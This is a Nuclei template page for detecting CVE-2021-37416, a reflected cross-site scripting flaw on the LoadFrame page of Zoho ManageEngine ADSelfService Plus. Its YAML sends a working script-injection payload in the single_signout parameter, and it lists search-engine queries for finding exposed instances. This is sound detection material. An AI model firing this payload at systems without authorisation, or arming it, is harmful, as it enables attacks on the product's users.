Skip to content
Nuclei Templates

Zoho ManageEngine ADSelfService Plus <=6103 - Cross-Site Scripting

ID: CVE-2021-37416

Severity: medium

Author: edoardottt

Tags: cve2021,cve,zoho,xss,zohocorp

Description

Section titled “Description”

Zoho ManageEngine ADSelfService Plus 6103 and prior contains a reflected cross-site scripting vulnerability on the loadframe page.

YAML Source

Section titled “YAML Source”
id: CVE-2021-37416


info:
  name: Zoho ManageEngine ADSelfService Plus <=6103 - Cross-Site Scripting
  author: edoardottt
  severity: medium
  description: Zoho ManageEngine ADSelfService Plus 6103 and prior contains a reflected cross-site scripting vulnerability on the loadframe page.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected user's browser.
  remediation: |
    Upgrade to a patched version of Zoho ManageEngine ADSelfService Plus (version >6103) to mitigate this vulnerability.
  reference:
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37416
    - https://blog.stmcyber.com/vulns/cve-2021-37416/
    - https://nvd.nist.gov/vuln/detail/CVE-2021-37416
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-37416
    cwe-id: CWE-79
    epss-score: 0.00149
    epss-percentile: 0.51001
    cpe: cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: zohocorp
    product: manageengine_adselfservice_plus
    shodan-query:
      - http.title:"ManageEngine"
      - http.title:"adselfservice plus"
      - http.title:"manageengine"
    fofa-query:
      - title="manageengine"
      - title="adselfservice plus"
    google-query:
      - intitle:"adselfservice plus"
      - intitle:"manageengine"
  tags: cve2021,cve,zoho,xss,zohocorp


http:
  - method: GET
    path:
      - "{{BaseURL}}/LoadFrame?frame_name=x&src=x&single_signout=x%27%3E%3C/iframe%3E%3Cscript%3Ealert(1)%3C/script%3E"


    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "text/html"


      - type: word
        part: body
        words:
          - "></iframe><script>alert(1)</script>"
          - "adsf/js/"
        condition: and


      - type: status
        status:
          - 200
# digest: 4a0a00473045022100bd49f3954676fb0c5279fd58927dbd5fb187ae8fc385d71e1e2646fcbf5f506e02201eded762bf5d02d13454d39e654305392a846489ab5e7d034e4e3a7ab23579bd:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-37416.yaml"

View on Github